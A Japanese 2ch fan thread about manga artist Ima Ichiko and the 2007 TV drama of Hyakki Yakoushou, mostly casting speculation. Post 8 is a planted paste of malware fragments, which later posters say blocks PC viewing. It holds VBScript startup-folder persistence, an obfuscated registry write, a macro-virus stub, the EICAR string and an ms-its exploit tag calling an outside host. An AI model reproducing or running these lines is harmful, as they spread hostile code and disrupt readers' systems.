5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

== 今市子 〜百鬼夜行抄と作品全般 巻ノ拾六 ==

1 :花と名無しさん:2006/12/13(水) 21:44:58 ID:???0
== 今市子 〜百鬼夜行抄と作品全般 巻ノ拾六 ==
代表作『百鬼夜行抄』の最新刊は14巻(以下続刊)
文庫版は8巻まで出ています(大判13巻分まで収録)

前スレ
巻ノ拾伍 http://comic6.2ch.net/test/read.cgi/gcomic/1156812313/
*801板(21禁)にも専用スレあり。21才以上で、そちら系の話を
したい方はどうぞ

関連スレ ★ ネムキ〜眠れぬ夜の奇妙な話〜 第5夜 ★
http://comic6.2ch.net/test/read.cgi/gcomic/1142999380/

過去ログ・作品リスト・良くある質問は>2-10あたり

*次のスレ立ては980の方お願いします。

2 :花と名無しさん:2006/12/13(水) 21:45:51 ID:???0
【過去ログ】
巻ノ拾肆 http://comic6.2ch.net/test/read.cgi/gcomic/1148571465/
巻ノ拾参 ttp://comic6.2ch.net/test/read.cgi/gcomic/1140815583/
巻ノ拾弐 ttp://comic6.2ch.net/test/read.cgi/gcomic/1129344393/
巻ノ拾一 ttp://comic6.2ch.net/test/read.cgi/gcomic/1125137981/
巻ノ拾  ttp://comic6.2ch.net/test/read.cgi/gcomic/1121958285/
巻ノ九  ttp://comic6.2ch.net/test/read.cgi/gcomic/1113583941/
巻ノ八  ttp://comic6.2ch.net/test/read.cgi/gcomic/1099534956/
巻ノ七  ttp://comic6.2ch.net/test/read.cgi/gcomic/1085319204/
巻ノ六  ttp://comic4.2ch.net/test/read.cgi/gcomic/1072374398/
巻ノ五  ttp://comic.2ch.net/test/read.cgi/gcomic/1064859507/
巻ノ四  ttp://comic.2ch.net/test/read.cgi/gcomic/1051032594/
巻ノ三  ttp://comic.2ch.net/gcomic/kako/1043/10435/1043591220.html
巻ノ二  ttp://comic.2ch.net/gcomic/kako/1036/10361/1036157527.html
巻ノ一  ttp://comic.2ch.net/gcomic/kako/1017/10176/1017620298.html

3 :花と名無しさん:2006/12/13(水) 21:47:58 ID:???0
【作品一覧】

 「百鬼夜行抄」1〜14巻(文庫1〜8巻)(朝日ソノラマ)
 「孤島の姫君」(朝日ソノラマ)
 「懐かしい花の思い出」 (朝日ソノラマ)
 「砂の上の楽園」(朝日ソノラマ)
 「岸辺の唄」「雲を殺した男」(集英社) 
 「文鳥様と私」1〜7巻(あおば出版)
 「文鳥様と私」愛蔵版 1
 「美しき獣たち」(朝日ソノラマ)←文鳥漫画

ボーイズラブ
 「マイビューティフルグリーンパレス」(白夜書房)入手困難
 「GAME」(祥伝社)
 「5つの箱の物語」(朝日ソノラマ)
 「大人の問題」(芳文社)
 「あしながおじさんたちの行方」全2巻 (芳文社)
 「楽園まであともうちょっと」全3巻(芳文社)
 「いとこ同士」(ムービック)
 「B級グルメ倶楽部」(ムービック)
 「幻月楼奇譚」(キャラコミックス)
 「笑わない人魚」(あおば出版)

画集
 「画集〈百鬼夜行抄〉」
 「夕景」
 「百鬼夜行抄 イラストコレクション」

 「花と文鳥―大人の塗り絵画集 」

4 :花と名無しさん:2006/12/13(水) 21:49:34 ID:???0
【連載中の作品】

  「百鬼夜行抄」(ネムキ /朝日ソノラマ)
  「岸辺の唄」(幻想夜話 /集英社)

【シリーズ作品】

  「幻月楼奇譚」(Chara)
  「文鳥様と私」(ハムスター倶楽部他 /あおば出版)
  「B級グルメクラブ」(Daria)
  「僕のやさしいお兄さん」(花音)

【連載中断】

 「夜と星のむこう」

*他「花恋」「ほんとにあった笑っちゃう話」「コミックアクア」等でエッセイ漫画も

【百鬼夜行抄 ドラマCD】
 第1巻 「凍える影が夢見るもの」
 第2巻 「闇からの呼び声」
 第3巻 「不老の壺」
 第4巻 「返礼」
 第5巻 「夏の手鏡」

5 :花と名無しさん:2006/12/13(水) 21:50:54 ID:???0
【良くある質問】

Q 「精進おとしの客」のお父さんの設定が違うのでは?
A 設定は別物です。「精進おとしの客」は読み切りで掲載され、設定を少し変えて、
  連載を開始しました。詳しいことは大判の一巻の後書きにあります。

Q 文庫は大判のどこまで入ってますか?
A 文庫8巻は大判13巻まで入ってます。

Q 文庫と大判との違いは?
A 大判には、1巻に他コミック未収録の「真夏の月」、巻末に今さんの近況漫画が
  入っています。

Q 福ちゃんの不慮の事故って何があったの?
A 分かりません。このスレでも毎回推測でループしてます。
  今さんが発表しない事情がある事を察して下さい。

Q イラストを描いている作品は?
A 過去スレ(巻ノ四 >>10-11 or 巻ノ三 >>628-631)を参照してください。

Q 「楽園〜」から5年後の話があると聞いたのですか?
A 単行本「笑わない人魚」に収録されている「真夏の城」という
  話がそうです。元はHOTELというアンソロジーに収録されていた
  ものですが、この度めでたく単行本に収録の運びとなりました。

Q 『百鬼夜行抄』以外のオススメは?
A ファンタジー系なら「岸辺の唄」シリーズ、
BLは「大人の問題」「あしながおじさんたちの行方」はコミカルな話しがメインなので
読みやすいようです。同じくBLの「幻月楼」は時代や雰囲気が百鬼っぽい所も。
もちろん他の物も面白いので是非どうぞ。

6 :花と名無しさん:2006/12/13(水) 21:53:18 ID:???0
2007年2月より日本テレビにて『百鬼夜行抄』放送決定
ソース
http://ucgi.asahisonorama.co.jp/cgi-bin/index.cgi
ネムキ1月号にも載ってる

162 名無しさんは見た!@放送中は実況板で : sage  2006/12/13(水) 17:10:26 ID:jGN2FRDN 
テレ東深夜(フォーサイド枠)
1/8〜
しにがみのバラッド。
浜田翔子、吉田里琴
秋山奈々、南明奈、緑友利恵、入船加澄実、仲村みう

日テレ深夜(黄金の舌枠)
2/3〜
百鬼夜行抄

7 :花と名無しさん:2006/12/13(水) 21:57:00 ID:???0
1月中旬  百鬼夜行抄(15) 今市子 800

8 :<body onload=window()>:2006/12/13(水) 22:02:26 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

9 :花と名無しさん:2006/12/13(水) 22:02:31 ID:???0
乙〜

10 :花と名無しさん:2006/12/14(木) 01:45:07 ID:???O
>>1
乙!

しかしなんでまたウィルスコードが…新スレになったらPCで見れるようになると思ったのにorz

11 :花と名無しさん:2006/12/14(木) 11:48:41 ID:???0
>>10
一般ブラウザなら、ウイルスコードのある>8を除いたURLを指定すれば、
PCから見れると思うよ。
http://comic6.2ch.net/test/read.cgi/gcomic/1166013898/1-7
http://comic6.2ch.net/test/read.cgi/gcomic/1166013898/9-100
とか。

12 :花と名無しさん:2006/12/14(木) 12:58:20 ID:???O
一応保守っとく

13 :10:2006/12/14(木) 17:33:22 ID:???O
>>11
おぉお見れた!ありがとう!!

14 :花と名無しさん:2006/12/15(金) 07:50:23 ID:???0
>>1さん乙
ドラマキャスト発表が待ちどおしい

15 :花と名無しさん:2006/12/15(金) 14:24:17 ID:???O
携帯サイトにもドラマ告知でたね。
本当なんだぁ。なんか不思議な感じだな。観たいような観たくないような…

16 :花と名無しさん:2006/12/15(金) 17:33:58 ID:???O
司ちゃんは栗山千明がいいんじゃないかな。
しかしそうなると、顔や雰囲気が似てるという律が…
予算少なそうだから、あんまり期待はしないけど。
拝み屋は絹代ちゃんが「なかったこと」になってるらしいし、
尾白尾黒もどうなるんだかなあ…

17 :花と名無しさん:2006/12/15(金) 19:13:00 ID:???0
当然CG

18 :花と名無しさん:2006/12/15(金) 21:12:13 ID:???0
駅の本屋に画集が大量に平積みされてた。
ほしいけど高いよーでも欲しいよー

19 :花と名無しさん:2006/12/15(金) 22:09:43 ID:???0
ぬいぐるみだろw

20 :花と名無しさん:2006/12/15(金) 23:29:16 ID:???0
尾白と尾黒という名前の人の形(他の人には鳥に見える)妖怪かもしれない。


21 :花と名無しさん:2006/12/16(土) 00:20:17 ID:???0
オジロ・オグロは人間(双子)が演じる。
キメ台詞は「ちょっと・ちょっとちょっと」

22 :花と名無しさん:2006/12/16(土) 11:41:06 ID:???0
オジロ、女じゃん。
双子じゃヘン。

23 :花と名無しさん:2006/12/16(土) 11:41:24 ID:???0
悔しいけど笑ってしまった事を書いておく>21

24 :花と名無しさん:2006/12/16(土) 13:29:56 ID:???0
深夜枠だったらいいな…
関係ないけど今さんの作品ならBLものの方が実写化しやすそう。

25 :花と名無しさん:2006/12/16(土) 14:28:01 ID:???0
>>24
日テレの深夜枠だよ>>6

26 :花と名無しさん:2006/12/16(土) 15:37:54 ID:???0
確かに「大人の問題」あたりならゲイも出てくるホームコメディ
として普通に受けそうだ。>実写化

27 :花と名無しさん:2006/12/16(土) 21:57:23 ID:???0
過去に世にも奇妙な〜で今さんの短編ドラマ化されてたんだね
稲垣君主演で…見てみたかったな

ところで、この枠のドラマって見たことないんだけど出来はどうなの?
司=栗山千秋はイメージぴったりだけど、律は全然思いつかないw
新人のジャニーズとかだったら嫌かも

28 :花と名無しさん:2006/12/16(土) 22:12:15 ID:???0
>>27
新人のジャニだったら小学生とかでしょ。
年齢考えたらジャニであっても新人は来ないだろうしその点だけは安心かもw

29 :27:2006/12/16(土) 22:24:36 ID:???0
そうか…ジャニは新人だと小学生くらいなんだなw

30 :花と名無しさん:2006/12/16(土) 22:30:19 ID:???0
ジャニでも岡田なんとかっていうV6の子なら許す。
「はなよりもなほ」主演した子。あれは良かった。

31 :花と名無しさん:2006/12/16(土) 22:48:48 ID:???0
テレ朝の深夜枠なら、けっこう豪華な出演者が望めそうだけど
日テレの深夜枠だとあまり期待できないかもね

32 :花と名無しさん:2006/12/17(日) 00:23:12 ID:???0
今北。
ドラマ化ってマジだったのかorz

33 :花と名無しさん:2006/12/17(日) 04:28:40 ID:???0
確かに岡田は前髪がなんとなく律っぽいかも
でもさすがに深夜枠で岡田は無理でしょう

34 :花と名無しさん:2006/12/17(日) 09:01:52 ID:???O
福士せいしとか新人では好きなんだが律っぽくはないね。
むちゃくちゃなミスキャストになる気がする。

35 :花と名無しさん:2006/12/17(日) 12:18:19 ID:???0
>>27
ようつべでupされてたと前スレで書かいてあった稀ガス。

Bk1で予約してた画集キタ━━゚+.ヽ(≧▽≦)ノ.+゚━━ ッ!!!!
すげーやっぱり綺麗。
しばらく'`ァ'`ァ(;´Д`) '`ァ'`ァ できそう。
最後のあとがきマンガ、桜の色が真っ赤すよ…(´・ω・`)

36 :花と名無しさん:2006/12/17(日) 15:08:09 ID:???0
発売日に大手本屋に行ったのにすっかり
画集の存在忘れてた…⊂⌒~⊃。Д。)⊃

37 :花と名無しさん:2006/12/18(月) 00:28:32 ID:???0
律は松山ケンイチがこなせそうな希ガス

38 :花と名無しさん:2006/12/18(月) 00:52:32 ID:???0
律は目はでかい印象だから松山はなぁ…
それこそ藤原竜也とかw声はドラマCDと似てる。
年取りすぎか。

39 :花と名無しさん:2006/12/18(月) 01:06:52 ID:???0
>>38
昔の日活ロマンポルノとかに比べればそれくらい

40 :花と名無しさん:2006/12/18(月) 02:20:56 ID:???0
 ドラマ化知ったよ・・
ついにここまで魔の手が!ショックで本気で落ち込みながらネムキ立ち読み。
絹さんがキタジマサブローに気ずきそうなオープニングで一瞬マンガの終焉を
感じた。まとめに動きだしたのかと・・

ドラマはドラマで完成度高ければいいな
個人的には格調たかく、怖い所はマジ怖く、鳥たちのおもしろと予定調和
創って最期はホっとしておわれる感じにしてほしい 

どうか実力者の監督に!安制作費じゃ若手社員か?
司はバンテーンの人が似ているけど男版がみつからない・・
長文スマソ

41 :花と名無しさん:2006/12/18(月) 07:01:03 ID:???0
>>27
どの話が?>世にも〜

42 :花と名無しさん:2006/12/18(月) 07:33:13 ID:???0
>>41
僕は旅をする

43 :花と名無しさん:2006/12/18(月) 10:52:59 ID:???0
>>40
作者も出版社も、立ち読みですませる「気ずきそう」な人に
魔の手なんて言われたくないだろうよw

44 :花と名無しさん:2006/12/18(月) 11:18:32 ID:???0
魔の手なんて使われたくない

と読んでしまった。

45 :花と名無しさん:2006/12/18(月) 11:18:36 ID:???0
無駄な煽りはイラネ

46 :花と名無しさん:2006/12/18(月) 13:57:02 ID:???0
flipflapに律と司やって欲しい・・

47 :花と名無しさん:2006/12/18(月) 14:41:53 ID:???0
すんごい古いとこ持ってきたな・・・

48 :花と名無しさん:2006/12/18(月) 17:51:45 ID:???0
>>27
「ぼくは旅をする」は「世にも奇妙な物語 スマップの特別編」として
ビデオ化、DVD化されてるよ。
amazonで買えるし、私はレンタルビデオで見たよ。

49 :花と名無しさん:2006/12/18(月) 18:52:21 ID:???0
>>34
>福士せいしとか
この人、のだめの黒木くんやってる人だよね
顔立ちは律っぽくはないけど
黒木くんの演技見てると、律もいい感じで演じてくれそうな気がする!


50 :花と名無しさん:2006/12/18(月) 18:53:32 ID:???0
でも、まあ、深夜枠なら
ぱっと名前が思いつくような役者・タレントは起用されんだろうな。

51 :花と名無しさん:2006/12/18(月) 23:55:56 ID:???0
まあ、深夜枠で無名の役者だったら
少々原作ぶち壊してても忘れ去られる程度だな

52 :花と名無しさん:2006/12/19(火) 19:39:31 ID:???O
何があっても『Papa told me』よりはマシ。
関西在住だけど、関西弁の律や司だったらと思うと…

53 :花と名無しさん:2006/12/19(火) 21:52:58 ID:???0
固太りで茶髪の律
どう見ても30超えてる司

54 :花と名無しさん:2006/12/19(火) 22:05:38 ID:???0
>52
それ最悪…。

55 :花と名無しさん:2006/12/19(火) 22:37:20 ID:???0
いっそそこまで違っていたら腹も立たないかもしれない。

56 :花と名無しさん:2006/12/19(火) 22:37:59 ID:???0
彦麻呂→律とか
山村紅葉→司とか。

57 :花と名無しさん:2006/12/19(火) 23:37:22 ID:???O
>>56
土曜ワイド劇場『殺人グルメレポート
メインディッシュは憎しみのフルコース!
犯罪の宝石箱に人気レポーターが挑む!』
全然百鬼じゃないよorz

58 :花と名無しさん:2006/12/19(火) 23:42:33 ID:???0
>>57
ワロス

59 :56:2006/12/20(水) 01:11:29 ID:???O
よく考えたらメインディッシュがフルコースなのはおかしいな。

>>58
笑ってくれてありがとう。

60 :花と名無しさん:2006/12/20(水) 01:12:15 ID:???O
つか57だった。
スレ汚しごめんなさい。

61 :花と名無しさん:2006/12/20(水) 01:15:48 ID:???0
普通に読み流してた。
メインディッシュ=「憎しみのフルコース」ではなく、
フルコース(メインディッシュは憎しみ)って意味で。

62 :花と名無しさん:2006/12/20(水) 04:32:09 ID:???0
>>27
自分もこないだようつべで見たから、まだ消されてないとオモ

63 :花と名無しさん:2006/12/20(水) 12:22:06 ID:???0
テニミュとかあのへんの役者がくるかも

64 :27:2006/12/20(水) 17:50:50 ID:???0
>>48
ありがとう
レンタル屋で見かけたら見てみる!

65 :花と名無しさん:2006/12/20(水) 17:53:35 ID:???0
百鬼の枠って、今やってる地獄少女の枠なんだよね?
主役の子は知らなかったけど、脇役がけっこう知名度高い人たちだった
見たことないんでクオリティは分からないけど・・・

66 :花と名無しさん:2006/12/20(水) 23:31:24 ID:???0
地獄少女<実写ドラマは2006年11月4日から、日本テレビと静岡第一テレビのみで放送されている。

地方者は見られないね(´・ω・`)


67 :花と名無しさん:2006/12/21(木) 00:04:17 ID:???0
単行本の売上げを考えると、
ドラマ化でももっといい枠を与えてもいい作品だと思うけどなあ

68 :花と名無しさん:2006/12/21(木) 01:13:34 ID:???0
深夜でいいよ。良い枠で放送なんてことになったら
ストーリーもキャラもものすごい改悪されそうだよ。

69 :花と名無しさん:2006/12/21(木) 01:24:00 ID:???0
しかし深夜過ぎると予算が足りずもの凄いチープになる。
妖魔とかひどいことになりそうだ。

70 :花と名無しさん:2006/12/21(木) 01:31:38 ID:???0
68の気持ちも、69の気持ちも良くわかるなぁ。
映画化されて生きる作品かも?

とは言え、今回の作品も楽しみにしてる。
でも>>66の言うように地方者には見られないの?

71 :花と名無しさん:2006/12/21(木) 01:43:54 ID:???0
【061213:ドラマ】今市子作『百鬼夜行抄』TVドラマ化、2007年2月より放送予定
http://anime.2ch.net/test/read.cgi/comicnews/1165992078/l50

72 :花と名無しさん:2006/12/21(木) 02:26:45 ID:???0
深夜=DVD化が目的の場合もある
DVD化が目的の場合は良くなるけど、百鬼の場合はどっちだろ…不安だ

73 :花と名無しさん:2006/12/22(金) 09:19:46 ID:???0
深夜ワクだから、たいしたキャストじゃないだろうな

74 :花と名無しさん:2006/12/22(金) 09:38:27 ID:???0
こんなキャストの作品もあるから期待できるんじゃない?w

ttp://sakaiminato.net/photolib2/P00918.jpg
ttp://sakaiminato.net/photolib2/P00917.jpg

75 :花と名無しさん:2006/12/22(金) 09:45:17 ID:???0
↑ちょwナニコレwww
カトリの忍者ハットリくん以来の笑撃

76 :花と名無しさん:2006/12/22(金) 11:09:24 ID:???0
さっきラジカルにでてた山下美穂子ってコが司ちゃんに合いそうだなーと思った。
エコエコアザラクにもでてるみたいだしw大物でもないし深夜にぴったりな顔

77 :花と名無しさん:2006/12/22(金) 11:42:45 ID:???0
鬼太郎イケメンーーーーアワ((゚゚дд゚゚ ))ワワ!!

78 :花と名無しさん:2006/12/22(金) 12:07:05 ID:???0
>>74
むしろこっちだろ
http://www.nekomekozo.jp/

79 :花と名無しさん:2006/12/22(金) 13:40:25 ID:???0
>>74
ちょ…w
吹いたwwwwww
かっこいいのに笑いがこみ上げるってすごいな!

80 :花と名無しさん:2006/12/22(金) 14:35:43 ID:???0
ウエンツはともかく田中麗奈…いいのか?こんな役W

81 :花と名無しさん:2006/12/22(金) 14:41:10 ID:???0
なんかすっごいびみょーな空気が流れそうだ

82 :花と名無しさん:2006/12/22(金) 17:46:12 ID:???0
こなきじじいは間師匠じゃなくて、
やっぱり赤星昇一郎でしょう。 夢見るぞっと。

83 :花と名無しさん:2006/12/22(金) 21:06:49 ID:???0
いやでもこれ
脇のキャストは結構好みだww

84 :花と名無しさん:2006/12/22(金) 22:01:19 ID:???0
>>80
原作の猫さんは美少女設定だったはず。

85 :花と名無しさん:2006/12/22(金) 22:13:48 ID:???0
京極堂につきもの落としされたときも美少女になってたからな。

86 :花と名無しさん:2006/12/25(月) 22:57:46 ID:???0
>>35
緋寒桜なんかは真っ赤(ものすごく濃いピンク)だよん

87 :花と名無しさん:2006/12/28(木) 02:41:51 ID:???0
あおば出版から
「とりさん」出るね
本日発売

88 :花と名無しさん:2006/12/28(木) 10:43:59 ID:???0
>>87
「トリさま」っすよ。
ttp://www.bk1.co.jp/product/2733509

89 :花と名無しさん:2006/12/29(金) 08:03:22 ID:???0
>>87、88
昨日買った。情報どうも。

90 :花と名無しさん:2006/12/29(金) 16:18:09 ID:???O
今さんの漫画のってるの?

91 :花と名無しさん:2006/12/29(金) 16:23:56 ID:???0
載ってるからこのスレに書かれてるんじゃ…www

92 :花と名無しさん:2006/12/29(金) 23:25:58 ID:???0
今さんの新作?

93 : 【大吉】 【1869円】 :2007/01/01(月) 07:20:29 ID:???0
あおば出版もアンソロの時くらいもう少し詳しい説明付けて欲しいわ

94 : 【中吉】 【1193円】 :2007/01/01(月) 12:17:31 ID:C0NQaIEA0
↑このスレに あけおめ〜☆ よい年でありますように。
百鬼のキャラみんな好き〜☆
!omikuji!dama ←を名前欄に入れるとおみくじができるよ。



95 : 【大吉】 【518円】 :2007/01/01(月) 18:29:05 ID:???0
「トりさま」ってねこだまとかいぬプチとかのシリーズだったんだね。
他の作家さんどんな人が参加してるのかな。

96 :花と名無しさん:2007/01/04(木) 13:13:33 ID:???O
他サイトでの情報だけど、のせていいかな…
律の役は細田よしひこって俳優らしい。で、ブログを見てみたら…
ttp://ameblo.jp/yossy-in-nangoku/entry-10022531373.html
この家で、パジャマを着て走り回る撮影って…百鬼?
戦闘シーンが多いと書いてるし…

97 :花と名無しさん:2007/01/04(木) 16:07:40 ID:???O
テレビジョンに載ってたあとは酒井彩名・いしのようこ・渡辺いっけい・市毛良江 らしい

98 :花と名無しさん:2007/01/04(木) 16:56:59 ID:???0
個人的には、律はアリ!
お父さんのいっけいさんも、言われて見ればはまりそうだ。
酒井彩名は見た目はそこそこだけど、演技力が気になる…。

99 :花と名無しさん:2007/01/04(木) 17:41:57 ID:???0
お父さんは渡辺いっけいより小林薫がよかったな

100 :花と名無しさん:2007/01/04(木) 17:52:41 ID:???O
律、見た目はかなりハマってる。ファンが痛いけどw
酒井若菜は可愛いけど司ちゃんとはイメージ違うなぁ。
いっけいさんは確かに言われてみればアリな気がする。

101 :花と名無しさん:2007/01/04(木) 18:15:20 ID:???0
>>100
若菜と彩名じゃ大きく違うよー。
ビジュアルイメージはまあ近いほうかな…酒井彩名の司役。身長も高そうだ。


102 :100:2007/01/04(木) 19:18:01 ID:???O
>>101
あっ彩名か!ほんと全然違うw

酒井彩名ならビジュアルはいいかも〜
なんか懐かしい名前だけど。

103 :花と名無しさん:2007/01/04(木) 23:06:40 ID:???0
ギャルっぽい司なんて嫌だぁ

104 :花と名無しさん:2007/01/04(木) 23:12:15 ID:???0
>>74
…やっぱりキタロウは堂本剛の方が良かったかな…

105 :花と名無しさん:2007/01/05(金) 03:58:48 ID:???0
いしのようこがすっげー気になる

106 :花と名無しさん:2007/01/05(金) 09:56:49 ID:???O
渡辺いっけいさん好きだからうれしいなー
こうなると他キャストが気になってくる
開さんとか赤間とか

しかしドラマ化のせいでうじきつよしさんが
大家さんにしか見えなくなった様に
百鬼の人もそうなるんだろうなー

107 :花と名無しさん:2007/01/05(金) 14:18:27 ID:???0
全てのストーリーは放送できないだろうから、いくつか選ぶだろうね。
三郎さんの箱庭の話はぜひ見たい。放送コードにひっかかるかもしれないけど。
三郎さんには、地味かっこいい人を希望

108 :花と名無しさん:2007/01/05(金) 14:29:57 ID:???O
三郎さん、中村俊介とかどうだろ。
年末番組でやけにバンダナ似合ってたんで。

酒井彩名良いねー。美人だ。演技はそこそこできたら良いから見た目重視で。
大河ヒロインの酷さに比べたら夢のようだ

109 :花と名無しさん:2007/01/05(金) 18:35:55 ID:???0
いっけいさんいいね。小日向さん希望だったんだけど、いっけいさんのが合ってるわ。
いしのさんは律母役だと思うけど、なんか違うわ。色白だから雪女っぽいってことか?

110 :花と名無しさん:2007/01/05(金) 21:58:44 ID:???0
俳優さんに詳しくないので、イメージに近い画像を集めてみましたw

細田よしひこ
ttp://www.stardust.co.jp/rooms/section3/file/hosoda/img/profile.jpg
酒井彩菜
ttp://bose619.up.269g.net/image/aya_03.JPG
渡辺いっけい
ttp://tv.goo.ne.jp/topics/img/dongame4_200_293.jpg
市毛良枝
ttp://canariya.img.jugem.jp/20060119_107451.jpg
ttp://www.asahi-net.or.jp/~sm3a-mto/datastock3/famous/photo/ichigeyosie.jpg
(昔の写真だけど↑絹さんぽいようなw)
いしのようこ
ttp://www.medicaln.net/images/interview_photo/02_txt01.jpg
ttp://wws.tv-asahi.co.jp/abare/img/cast/ishino.jpg(←妙さん(前世絹?)と思えば…)

111 :花と名無しさん:2007/01/05(金) 23:52:20 ID:???0
司役には健康的すぎるような気もするが、検討に期待するか。
いっけいは真面目な律父と下品な青嵐をきっちり演じ分けてくれそう。
でも、小日向さんかあ。言われてみると確かに適任だね。脳内妄想で楽しんどくよ。

112 :花と名無しさん:2007/01/06(土) 00:26:52 ID:???0
絹さんの役は市毛良枝なのかいしのようこなのか…?
イメージ的には市毛良枝の方が近いような気がするけど、
そうしたらいしのようこが誰の役なのかわからんしなあ。
(いしの=絹さんだったら市毛=八重子さんだろうけど)

113 :花と名無しさん:2007/01/06(土) 00:31:53 ID:???0
>>111
酒井彩名は割と影が似合うほうな気が。その写真だと健康的だけど。
司の明るくはないが飄々としたキャラ?に嵌ってくれるかはドキドキだな。
と書いて思ったけど、変なキャラ改変はしてほしくないなあ。


114 :花と名無しさん:2007/01/06(土) 01:48:41 ID:???0
なんかいしのようこのイメージだけだと
尾崎母子とかが似合いそうなんだけどな

115 :花と名無しさん:2007/01/06(土) 02:39:14 ID:???0
いっけいワロスwなんでそんなにぴったりの写真があんのw

116 :花と名無しさん:2007/01/06(土) 02:47:31 ID:???0
酒井彩名のブログでも百鬼ドラマの撮影報告してるね。
髪型はちゃんと司ちゃんに近い仕様っぽい?

117 :花と名無しさん:2007/01/06(土) 10:15:10 ID:???0
ドラマの話は専用スレでやれ

118 :花と名無しさん:2007/01/06(土) 11:46:09 ID:???0
始まるまではここでもいいじゃん
今特に話題もないし

119 :花と名無しさん:2007/01/06(土) 13:08:04 ID:???0
市毛良枝はおばあちゃん役なんじゃ

120 :花と名無しさん:2007/01/06(土) 13:35:53 ID:???0
>>110
いっけいに吹き出した

律役の人、「14才の母」の子に見えた

121 :花と名無しさん:2007/01/07(日) 00:40:09 ID:???0
青嵐サイコーwwwいっけいさん、やるなあ。しかし律が今市。
尾白尾黒登場シーンはどうなるのかなあ。

122 :花と名無しさん:2007/01/07(日) 01:16:56 ID:???0
司ちゃんは黒木メイサがよかったけど、それに似た男っていうと要潤になっちゃうw
三郎さんは誰がやるんだろう。開おじさんまでは話進まないだろうなあ。

123 :花と名無しさん:2007/01/07(日) 08:13:14 ID:???0
渡辺いっけいが「いらっしゃい…ニヤリ」とかするの激しく見たい
もうちょっとひょろ長いイメージもあるけどなー

124 :花と名無しさん:2007/01/07(日) 10:52:52 ID:???O
いっけいさん、ぴったりだ(笑)
あの薄気味悪さがよく出てる…。
司ちゃん、イメージだけなら栗山千秋と思ってたけど、
酒井彩名もかわいくていいね。

125 :花と名無しさん:2007/01/07(日) 11:31:18 ID:???O
酒井彩名は昔のイメージしかなかったけど、ブログ見たらすごい可愛くてびっくりした。
つーか30分ドラマなのか〜微妙…

126 :花と名無しさん:2007/01/07(日) 14:16:03 ID:???0
昨年の花より男子で栗巻綾乃を演じた時はギャルっぽかったんで心配してたんだけど、
ブログを見たら落ち着いた髪になってたんで安心した。(シャギーは気になるけど)
茶髪って雑誌でみるといい感じなんだけど、テレビだと何故かアホっぽく映るよね。
色白の女優さんは黒髪の方が映える。

127 :花と名無しさん:2007/01/07(日) 19:31:03 ID:???0
いっけいの画像、ファイル名から察するに百鬼とは無関係だよね。
よくここまでぴったりな感じのがあったなw

128 :花と名無しさん:2007/01/07(日) 19:34:28 ID:???0
ドラマ「百鬼夜行抄」記者会見
http://www.mainichi-msn.co.jp/entertainment/geinou/200701/graph/07/index.html
やっぱり、いっけいさんハマってる。
律は幼く感じてしまうけど、連載開始の頃ならこんな感じ?
酒井彩名、確かにシャギー入ってなければ・・・か?
今さんの書くイメージ通りに行くわけは・・・ 
石野陽子と絹さんは似てないけど、霊感なしの脳天気な感じはでてるかも?


129 :花と名無しさん:2007/01/07(日) 19:41:53 ID:???0
>全12話(放送9話、DVD3話)になる予定。
え〜〜

130 :花と名無しさん:2007/01/07(日) 19:50:20 ID:???0
>>128
律もいろいろ写真見たらいい感じかも
ほんと連載開始の頃って感じだね

青嵐の人型中身はどうなるんだろう。

131 :花と名無しさん:2007/01/07(日) 19:51:32 ID:???0
どの写真を見てもいっけいハマりすぎw
ドラマ化には最初引いてたけど割りと楽しみになってきた
いしのようこはポヤヤンとした声だし何より着物が似合うのが良いな

132 :花と名無しさん:2007/01/07(日) 20:31:26 ID:???0
>>128
律役の子、広末にそっくりだ…

133 :花と名無しさん:2007/01/07(日) 20:37:05 ID:???0
いっけいさん、嵌まりすぎだろwwwww
誰だいっけいさんをキャスティングしたのは!素晴しいw
律役の子、背が高くてよかった。小さい律じゃいやだったから安心した。

134 :花と名無しさん:2007/01/07(日) 21:35:53 ID:???0
>>128
いっけいの肥り具合や禿げ具合も原作のお父さんっぽい!
目が妖しいぞw 人型青嵐はなしでいくのかな。

135 :花と名無しさん:2007/01/07(日) 23:01:03 ID:???0
>>127
「特命!刑事どん亀」ってドラマの写真です
(後ろに刑ってみえてるよね)

イメージ検索したらかなり最初の方に出てきて
吹き出しますた

136 :花と名無しさん:2007/01/07(日) 23:09:43 ID:???0
15巻が近日発売なのか。

137 :花と名無しさん:2007/01/07(日) 23:20:01 ID:???0
>>128
額装の書(拓?)の鴨居用額縁受に座布団宛がわれてるのがGJ!

138 :花と名無しさん:2007/01/07(日) 23:57:06 ID:???0
いっけい氏最高w
何度見ても笑っちゃうほど似てて良いわ〜。
反面律がちょっとなぁ…

139 :花と名無しさん:2007/01/08(月) 01:52:18 ID:???0
>>129
ひどいね…9話まで見たら続きはDVD買えってことか。

140 :花と名無しさん:2007/01/08(月) 02:33:12 ID:???0
これ以上ドラマの話が続くと、ここがどこなのかを忘れてしまいそう。
いい加減、ドラマの話はテレビドラマ板の該当スレでと
棲み分けしてもらえないものだろうか。
向こう、まだ50レスちょっとしか進んでないじゃないか。

漫画の方で話題がないからいいだろう。
ってのはどうかと思うぞ。

141 :花と名無しさん:2007/01/08(月) 02:41:30 ID:???O
